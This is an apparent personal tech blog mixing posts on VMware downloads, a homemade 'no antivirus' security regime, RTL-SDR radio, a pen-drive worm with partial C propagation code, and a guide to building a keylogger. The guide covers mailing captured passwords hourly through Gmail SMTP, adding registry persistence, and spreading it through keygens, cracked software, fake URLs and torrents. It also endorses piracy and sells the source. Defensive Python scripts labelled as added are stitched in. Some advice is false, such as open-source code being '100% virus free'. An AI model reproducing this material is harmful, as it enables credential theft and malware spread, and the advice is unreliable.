Thursday, 26 November 2015

VMware Player Integration Tools download

I have found, many times, that attempting to download the VMware tools through the virtual machine never works.

Here is the direct link to the packages. Just go there, select your version and download it.

https://softwareupdate.vmware.com/cds/vmw-desktop/player/


For example, the 6.0.3 Windows package:

https://softwareupdate.vmware.com/cds/vmw-desktop/player/6.0.3/1895310/windows/packages/

How to Protect your PC from virus - Simple Tips

I never use antivirus, speed-up tools, etc. Why?


There are some secrets which I have been using for years; system admins will never tell you about this. Here is the technique I follow.



1. Rule One:  Startup is evil 


Location a:


Type "msconfig" in the Run box (I use Win 7)

or go to Start -> Accessories -> Run




In the "Startup" tab, just untick the entries one by one. Windows services never use this place for starting OS files, so don't show any mercy. If you feel an entry is a trusted application and needs to start automatically every time you log in, then leave it.


Location b:  Startup Menu /Folder 

Go to Start -> Startup; you can see the exe files.


Just right-click and delete them.

The actual paths are:

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Remember, these paths are hidden; to open them, use "Folder Options" (explained below).

Delete the suspicious programs (you can even delete all of them; Windows never uses this place to keep OS files).




2. Rule Two: Find the history of the bitch before kissing


How are you getting viruses onto your system? Either through a pen drive or a file download.

Whenever you connect a pen drive, verify the files. Don't show any mercy to untrusted "exe" files; just delete them.


While inserting a pen drive, watch out for:

    a. Hidden files
    b. Hidden extensions (.exe)
    c. Hidden system files

In the File Explorer window click "Organize"; for XP users, Tools -> Folder Options.





Select "Show hidden files" and uncheck the two checkboxes below it.

Now Windows will show all the files. (Caution: do not delete system files, especially in the OS directory; restrict yourself to the pen drive files. Once done, reverse the folder options.)

Don't be afraid to connect virus-affected pen drives to your system. Just manually verify the files. Some exe files look like folders, so do not click on anything unless you are sure about the files.

Wait, I will put a virus on my pen drive and show you.





You have deleted those files? Done? Empty the recycle bin too.

Once done, revert the "Folder Options" settings.


While downloading from the Internet

1. Make sure you are downloading from an authorized site. Check the site's "About Us" page, contact details, everything. A genuine company does not put a virus on your computer.

2. In case it is open source, download it, no issue. If they are providing source code, it will be 100% virus free. In case of any issues, you can go through the code and compile it yourself.

3. Read forums and reviews and see what others are saying about it. (take risk)

4. Double-click the file; Windows will give you a "Security Warning".



If the publisher is unknown, be careful while installing. Remember, there are many genuine software makers who don't buy certificates, so follow the first three rules: "From where are you downloading? Is it open source? Reviews?"

5. It could be a virus, but I want to install it at any cost; I have no option.

Install VMware Player/Workstation, and in that install a virtual XP, Win 7, Win 8 or Win 10.
Run the application on that OS and see the response. If everything goes well, no issue.
Otherwise delete the virtual OS. Simple.

Wednesday, 25 November 2015

RTL SDR - AM Radio

Recently I bought an RTL-SDR from China:

http://www.aliexpress.com/item/Free-Shipping-Quality-USB-2-0-Digital-DVB-T-SDR-DAB-FM-HDTV-Tuner-Receiver-RTL2832U/32410728890.html





It works in the 24 – 1766 MHz range.

What can we do with this device?

1. FM reception: 88-108 MHz

2. Air traffic control: 118–136.975 MHz. To find a nearby airport's frequency, just Google it.
   For India, the list of frequencies is below; give it a try :)
      http://ivao.in/resources/atc-frequencies-list/

3. AM, shortwave and ham radio fall in the 0-30 MHz range, which is not in the range of this device.


Up-Converters

Up-converters are available but are a bit costly; better to make our own device.
There is one up-converter which is very impressive, and its components are readily available from Element14/AliExpress.




Before that, I want to try the direct sampling method once.
Normally people use a transformer balun to get a balanced RF input. I haven't used that; I just soldered one pin.





Soldered 



Now close the cape 



Connect to the PC and add a 1 meter wire.



It's show time



Saturday, 7 November 2015

How a pen drive virus works?

Have you ever been affected by a pen drive virus?

Did you ever notice that all your folders were replaced with exe files carrying a folder image?










How it works?

It is built on top of two components:

1. Payload section -> can be a keylogger, data mining stuff, bots

2. Pen drive distribution


Here is the flow chart:

              Virus running (on startup)
                          |
      Check whether a pen drive is connected or not
                          |
      Check whether it is infected or not (why waste CPU?)
                          |
      Ensure that our virus is named after all the folders:
      if there is a folder named "photos", create our virus
      with the name "photos.exe"
                          |
      Now the pen drive is removed and the user connects it to another PC ...
      looking for the photos folder, fk .. no files
                          |
      Our virus is running in the background ->
      install the virus (just copy the exe to a secret folder),
      make the registry entry to start the virus whenever the PC boots
                          |
                        done


Only the distribution part is shown here; for the keylogger, please refer to the previous post.

CALLBACK TimerProc(HWND hwnd, UINT uMsg, unsigned int idEvent, DWORD dwTime)
{


int a  =GetLogicalDrives();

for (int i=0;i<12;i++) // 12 drives ,more than enough man
{
bit= (a>>i)&0x1;
if (bit)
{
switch(i)
{
case 0:
    continue;
break;
case 1:
strcpy(Str,"B:\\");
break;
case 2:
strcpy(Str,"C:\\");
break;
case 3:
strcpy(Str,"D:\\");
break;
case 4:
strcpy(Str,"E:\\");
break;
case 5:
strcpy(Str,"F:\\");
break;
case 6:
strcpy(Str,"G:\\");
break;
case 7:
strcpy(Str,"H:\\");
break;
case 8:
strcpy(Str,"I:\\");
break;
case 9:
// Str="J:\\";
strcpy(Str,"J:\\");
break;
case 10:
// Str="K:\\";
strcpy(Str,"K:\\");
break;
case 11:
strcpy(Str,"L:\\");
break;
}

}
    if (GetDriveType(Str)== DRIVE_REMOVABLE)   //  Me pendrive <- feed me
{
               // make a self copy
              // delete the folders 
        }

}
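
From the defender's side, the manual check described under Rule Two and the folder-name trick in the flow chart above can be automated. This Python sketch is an added example, not code from the original post; the extension lists and the sample file names are assumptions, and the hidden-attribute check only has an effect on Windows.

```python
import os
import tempfile

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs"}
DOCUMENT_EXTS = {".jpg", ".png", ".pdf", ".doc", ".docx", ".txt", ".mp3", ".mp4"}
FILE_ATTRIBUTE_HIDDEN = 0x2  # Windows file attribute bit


def is_hidden(path):
    # st_file_attributes exists only on Windows; elsewhere this reports False.
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def scan_drive_root(root):
    """Return sorted (name, reason) findings for the top level of a drive."""
    entries = os.listdir(root)
    folders = {e.lower() for e in entries if os.path.isdir(os.path.join(root, e))}
    findings = []
    for name in entries:
        path = os.path.join(root, name)
        stem, ext = os.path.splitext(name.lower())
        if os.path.isdir(path):
            if is_hidden(path):
                findings.append((name, "hidden folder"))
            continue
        if name.lower() == "autorun.inf":
            findings.append((name, "autorun file"))
        if ext in EXECUTABLE_EXTS:
            if stem in folders:
                findings.append((name, "executable named after a folder"))
            elif os.path.splitext(stem)[1] in DOCUMENT_EXTS:
                findings.append((name, "double extension"))
            else:
                findings.append((name, "executable in drive root"))
    return sorted(findings)


def build_sample_drive(root):
    # Constructed sample layout: empty placeholder files, no real binaries.
    os.mkdir(os.path.join(root, "photos"))
    for name in ("photos.exe", "holiday.jpg.exe", "notes.txt", "autorun.inf"):
        open(os.path.join(root, name), "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as drive:
        build_sample_drive(drive)
        for name, reason in scan_drive_root(drive):
            print(f"{name}: {reason}")
```

Point `scan_drive_root` at the drive letter of the pen drive (for example `E:\\`) before opening anything on it in Explorer.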

Custom Made Keyloggers

How many hours will it take for someone who has little C knowledge to write a custom keylogger?

What you need to know:

1. Key hooks

2. SMTP library / FTP library (only if you have FTP hosts). So many off-the-shelf libraries and packages are available; just google it. The one I use is from
 http://www.chilkatsoft.com/

3. That's all, it's done.


Then think about how you want to distribute this keylogger to the outside world:
pen drive, mails, keygen, cracked software, fake URL, torrents, etc.


No need to capture screenshots, no need to record Skype chat; once you have the password, you can do anything.

You can't separate hooks from the OS, be it Microsoft, Apple or Linux; it's part of the OS.


Detailed Design


Keylogger source 

  
Try it on your own PC; don't put yourself in trouble. That's my advice.

There is one very good article by Dor Alon published on CodeProject. It works well with VC++ 6.



It has 2 modules: one is a DLL, which is used to hook the keys, and the other is an exe.

Email/FTP forwarding

If you wish to store it as a file, do a file write operation and attach it to the mail.

If you don't like file operations, keep it in a buffer string and paste it in the email body.

Remember one thing: only a few ports are allowed by most firewalls, so use SMTP. That's best. He has used FTP, but where will we get free FTP servers? Some are available, but I don't know how they work or how safe it is to save our passwords there.

I recommend you use SMTP.

Chilkatsoft has an SMTP library. As usual, cracked software is everywhere; what to do, we are poor, we don't have money to buy this software. The concept of money making is a flawed theory, so all is fair. If God was fair to us, you and me wouldn't be poor now :)


void ChilkatSample(void)
    {
    //  The mailman object is used for sending and receiving email.
    CkMailMan mailman;
 
    //  Any string argument automatically begins the 30-day trial.
    bool success;
    success = mailman.UnlockComponent("30-day trial");
    if (success != true) {
        printf("%s\n",mailman.lastErrorText());
        return;
    }
 
    //  Set the SMTP server.
    mailman.put_SmtpHost("smtp.chilkatsoft.com");
 
    //  Set the SMTP login/password (if required)
    mailman.put_SmtpUsername("myUsername");
    mailman.put_SmtpPassword("myPassword");
 
    //  Create a new email object
    CkEmail email;
 
    email.put_Subject("This is a test");
    email.put_Body("This is a test");
    email.put_From("Chilkat Support <support@chilkatsoft.com>");
    email.AddTo("Chilkat Admin","admin@chilkatsoft.com");
    //  To add more recipients, call AddTo, AddCC, or AddBcc once per recipient.
 
    //  Call SendEmail to connect to the SMTP server and send.
    //  The connection (i.e. session) to the SMTP server remains
    //  open so that subsequent SendEmail calls may use the
    //  same connection.
    success = mailman.SendEmail(email);
    if (success != true) {
        printf("%s\n",mailman.lastErrorText());
        return;
    }
 
    //  Some SMTP servers do not actually send the email until
    //  the connection is closed.  In these cases, it is necessary to
    //  call CloseSmtpConnection for the mail to be  sent.
    //  Most SMTP servers send the email immediately, and it is
    //  not required to close the connection.  We'll close it here
    //  for the example:
    success = mailman.CloseSmtpConnection();
    if (success != true) {
        printf("Connection to SMTP server not closed cleanly.\n");
    }
 
    printf("Mail Sent!\n");
    }


Create a Gmail account, then use the settings above with a few changes, because Gmail works over SSL.

Remember, Gmail supports SSL/TLS:
mailman.put_SmtpHost("smtp.gmail.com");
mailman.put_SmtpPort(465);
mailman.put_SmtpSsl(true);

What the fuck I don't like about Chilkat/MFC is that it is bulky: if you add it as a static library, it takes huge space, 2 MB :)

Now your keylogger is integrated with SMTP. Put in a timer and set the time to 1 hour; every hour, it sends a message to you.

Again, Google allows 15 simultaneous mail accesses, meaning a single Gmail account can be accessed from 15 other places at a time.

Now your keylogger is integrated with an SMTP server.



Windows has several startup locations; there is a tool called "HijackThis" which highlights all of them. At the beginning of the code, add a line to make the registry entry in the startup locations so that it can start itself. Done.
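
The startup locations named under Rule One and the registry autostart entry mentioned above can be audited with a short script. This Python code is an added example, not part of the original post or of HijackThis; the user-writable path markers and the sample entries are constructed assumptions, and a hit means the entry deserves review, not that it is malicious.

```python
import os
try:
    import winreg  # standard library, present only on Windows
except ImportError:
    winreg = None

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
STARTUP_SUBDIR = r"Microsoft\Windows\Start Menu\Programs\Startup"
# Locations a standard user can write to. A hit is a prompt to review, not a verdict.
USER_WRITABLE = ("\\appdata\\", "%appdata%", "\\temp\\", "%temp%",
                 "\\programdata\\", "\\users\\public\\")
# Constructed sample entries (location, name, command) for running off Windows.
SAMPLE = [
    ("HKLM\\" + RUN_KEY, "VendorTray", r'"C:\Program Files\Vendor\tray.exe"'),
    ("HKCU\\" + RUN_KEY, "updater", r'"C:\Users\alice\AppData\Roaming\sys\updater.exe" /s'),
    ("HKCU\\" + RUN_KEY, "helper", r"C:\Users\Public\helper.exe"),
]


def read_autostart_entries():
    """Collect Run-key values and Startup-folder items; returns [] off Windows."""
    entries = []
    if winreg is None:
        return entries
    for hive, label in ((winreg.HKEY_CURRENT_USER, "HKCU"),
                        (winreg.HKEY_LOCAL_MACHINE, "HKLM")):
        try:
            with winreg.OpenKey(hive, RUN_KEY) as key:
                for i in range(winreg.QueryInfoKey(key)[1]):
                    name, value, _ = winreg.EnumValue(key, i)
                    entries.append((label + "\\" + RUN_KEY, name, str(value)))
        except OSError:
            continue  # key missing or unreadable
    for var in ("APPDATA", "PROGRAMDATA"):
        folder = os.path.join(os.environ.get(var, ""), STARTUP_SUBDIR)
        if os.path.isdir(folder):
            for item in os.listdir(folder):
                if item.lower() != "desktop.ini":
                    entries.append((folder, item, os.path.join(folder, item)))
    return entries


def review_entries(entries):
    """Return the entries whose command points into a user-writable location."""
    return [e for e in entries
            if any(marker in e[2].lower() for marker in USER_WRITABLE)]


if __name__ == "__main__":
    for location, name, command in review_entries(read_autostart_entries() or SAMPLE):
        print(f"{location}\n    {name} -> {command}")
```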


Note :

I should talk about antivirus here. Most antivirus software just blocks every exe. Some of them block based on historical signatures like checksum, name, date of creation, size, etc. If I explain how antivirus works, you will never use any antivirus in your lifetime.

Complete VC++6 source code is available 100$ ...